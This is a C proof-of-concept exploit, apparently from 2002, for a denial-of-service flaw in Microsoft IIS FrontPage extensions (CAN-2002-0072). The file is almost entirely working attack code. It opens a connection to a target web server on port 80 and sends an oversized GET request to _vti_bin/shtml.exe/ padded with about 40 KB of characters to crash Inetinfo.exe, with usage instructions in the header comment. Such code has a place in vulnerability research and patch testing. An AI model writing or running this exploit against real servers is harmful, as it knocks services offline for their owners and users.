/* iisfux0r.c - Microsoft IIS W3SVC Denial of Service, (c) Filip Maertens - PoC
   
   BUG-ID   : 2002009
   CVE      : CAN-2002-0072
   Advisory : Peter Grundle @ KPMG
              Dave Aitel @ AtStake
   
   ** This will bring down the Inetinfo.exe process, in which you create a Denial of Service
      condition on your webserver.   Please, confirm with management prior to executing this
	  proof of concept code.   The author of this code, nor Peter Grundle and Dave Aitel can
	  be helt responsible for disclosing this vulnerability.

   ** Example usage: RH-BOX# iisfux0r localhost /
   
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <unistd.h>
#include <string.h>

#define DENIALSIZE 40 * 1024
#define URLSEQUENCE "_vti_bin/shtml.exe/"

int main(int argc, char *argv[])
{

 struct sockaddr_in sin;
 char denialchar[DENIALSIZE + 100];
 int i, create_socket;

 printf("iisfux0r | Microsoft IIS W3SVC/FP2002 Denial of Service | <filip@securax.be>\n----------------------------------------------------------------------------\n");

 if (argc < 3)
 {
  printf(" -- Usage: iisfux0r [ip] [directory]\n");
  exit(0);
 }

 
 // Create the sockets
 
 if (( create_socket = socket(AF_INET,SOCK_STREAM,0)) > 0 )
 printf(" -- Socket created.\n");

 sin.sin_family = AF_INET;
 sin.sin_port = htons(80);
 sin.sin_addr.s_addr = inet_addr(argv[1]);

  if (connect(create_socket, (struct sockaddr *)&sin,sizeof(sin))==0)
      printf(" -- Connection made.\n");
  else
      { printf(" -- No connection.\n"); exit(1); }


 // Create the Denial of Service payload

  printf(" -- Crafting payload.\n");
  strcat(denialchar, "GET ");
  strcat(denialchar, argv[2]);
  strcat(denialchar, URLSEQUENCE);
  for(i=0; i < DENIALSIZE; i++)
  {
 	 strcat(denialchar, "x");
  }
  strcat(denialchar, ".html");
  strcat(denialchar, " HTTP/1.0\n\n");
 
   
  send(create_socket, denialchar, sizeof(denialchar), 0);
  close(create_socket);
   
}

// EOF - More exploits @ http://filip.compsec.be